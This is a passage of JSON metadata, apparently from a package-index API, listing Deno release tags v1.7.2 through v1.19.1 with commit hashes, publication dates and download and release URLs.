:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/ap